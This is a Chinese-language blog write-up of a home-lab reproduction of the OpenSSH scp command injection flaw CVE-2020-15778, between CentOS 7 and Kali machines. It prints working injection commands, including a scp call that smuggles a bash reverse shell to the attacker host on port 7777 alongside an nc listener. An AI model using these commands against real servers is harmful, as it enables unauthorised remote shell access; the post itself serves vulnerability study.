OpenSSH 命令注入漏洞(CVE-2020-15778)


最近看好多大佬都在復現這個OpenSSH命令注入漏洞,作為菜雞的我也要跟隨大佬的腳步,也來復現一波(不分析漏洞原理,本人是菜雞,能力不足)。再寫這篇博客很不幸的我(電腦蹦了重啟,寫好的都沒保存),不放棄繼續重新來一遍。

 

 

 

介紹

2020年6月9日,研究人員Chinmay Pandya在Openssh中發現了一個漏洞,於7月18日公開。OpenSSH的8.3p1中的scp允許在scp.c遠程功能中注入命令,攻擊者可利用該漏洞執行任意命令。目前絕大多數linux系統受影響。深信服安全研究團隊依據漏洞重要性和影響力進行評估,作出漏洞通告。

 

漏洞影響版本

OpenSSH =< 8.3p1

 

漏洞復現要求

OpenSSH =< 8.3p1

需要知道ssh密碼

 

搭建環境

centOS 7    IP:192.168.110.153

kali2019.4  IP:192.168.110.134

介紹一下scp命令:

 

 

 

下面開始行動:

關閉防火牆,(我沒有關閉,在這里我也就不關閉了。)

查看ssh版本吧

ssh -V

 

 

首先嘗試一下利用scp命令,用kali對centOS進行寫文件,復制文件。

scp 1.txt root@192.168.110.153:'`touch /tmp/test.txt` /tmp'

 

 

 

 

成功將kali上面的文件傳入道centOS上面,和自己創建了文件。

 

直接進行nc反彈獲取shell

先監聽一個端口

nc -lvvp 7777

進行反彈shell

scp test.txt root@192.168.110.153:'`bash -i >& /dev/tcp/192.168.110.134/7777 0>&1`/tmp/test1.txt'

 

 

 

 

總結:該漏洞復現簡單,漏洞等級 嚴重。復現需要知道ssh密碼,主要針對知道ssh密碼卻不給登錄,這樣就可進行反彈shell獲取權限了。

 

改正: 

我在總結說知道ssh密碼卻不給登錄,這個我今天復現嘗試了,禁止遠程登錄這個命令是不行的,應該是需要做別的策略,還在繼續探索中,主要修改一下自己錯誤的地方。

 

參考文章:OpenSSH 命令注入漏洞通告(CVE-2020-15778)

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM